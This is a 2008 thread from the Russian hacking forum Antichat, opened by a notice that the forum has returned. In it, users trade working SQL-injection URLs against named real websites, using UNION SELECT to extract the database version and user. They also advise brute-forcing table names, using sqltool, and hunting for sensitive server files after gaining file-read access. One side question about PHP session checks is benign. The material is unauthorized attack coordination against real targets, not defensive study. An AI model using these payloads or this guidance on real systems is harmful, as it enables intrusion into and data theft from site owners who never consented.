Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
07.03.2008, 04:09
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346
Репутация:
146
|
|
подскажите что дальше делать, на всех SQL <= 4-log
таблицы вручную попоббирал пока ничего.
http://www.dmdag.ru/partners2.php?id=1+union+select+1,version(),3,4,5, 6,7,8,9,10,11/*
http://www.05info.ru/showcnews.php?id=-1+union+select+1,user(),version(),4,5,6,7,8/*
http://www.color-it.net/news.php?id=1+union+select+1,2,3,4,5,6,7/*
http://megaspravka.org/viewcat.php?id=1+UNION+SELECT+1,version(),3,4,5,6, 7/*
|
|
|
07.03.2008, 04:27
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
перебирай дальше, пробуй стандарные типа user(s), admin(s), member(s), при желании можно брутфорсить )
__________________
|
|
|
|
07.03.2008, 06:13
|
|
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753
Репутация:
120
|
|
У меня такой вопрос
Есть доступ к корневому каталогу для просмотра фойлов
в каких фойлах содержится самая важная инфа по серваку, ну типа файлов iis6.log
кроме файлов pwd
Последний раз редактировалось neon_fx; 07.03.2008 в 06:17..
|
|
|
|
07.03.2008, 14:20
|
|
Участник форума
Регистрация: 28.10.2007
Сообщений: 143
Провел на форуме:
913233
Репутация:
162
|
|
нашел скуль
http://site.net/index.php?menu=-1'
возвращает
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1''' at line 1
пробовал подобрать кол столбцов
-1' union select 1,2,3,4,5.../*
дошел до 300шт и всеравно пишет
The used SELECT statements have a different number of columns
потом через
order by
узнал что столбцов 8...
юзера, версию маськи, и БД узнал посимвольным перебором
версия MySQL 4
тоесть под запросов тама нету(((
что делать дальше я хз((((
помогите плиз |
|
|
|
07.03.2008, 15:22
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 290
Провел на форуме:
1740746
Репутация:
435
|
|
пришли куки
PHPSESSID=1njbt3ksf71o1118ibr5shi7t2
скажите даст ли чтонибудь их расшифровка?
|
|
|
|
07.03.2008, 15:27
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
это не кукисы, это сессия, не расшифруешь, т.к. рандомно генерится
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
07.03.2008, 15:43
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Сообщение от xXvladXx
что делать дальше я хз((((
помогите плиз
попробуй проделать вышеописанные тобой действия с помощью sqltool и дальше TableName и FieldName Bruteforce
|
|
|
|
07.03.2008, 15:48
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782
Репутация:
81
|
|
Меня всегда интересовал ворпос
а безопастно ли вот так проверять:
if($_SESSION['valid_user'])
{
// бла бла бла
}
и можно ли как-нить подменить эту переменную в сесии?
и как вообще правильно писать такую верификацию?
|
|
|
|
07.03.2008, 16:08
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
в принципе не возможно.. только в случае тупоумности программистом, если они сешн через экстракт прогоняют.. тогда в теории можно.. но лично не встречал
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
07.03.2008, 19:35
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782
Репутация:
81
|
|
Помогите подобрать поля
http://www.logika.kz/index.php?p=news&order=&st=6
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
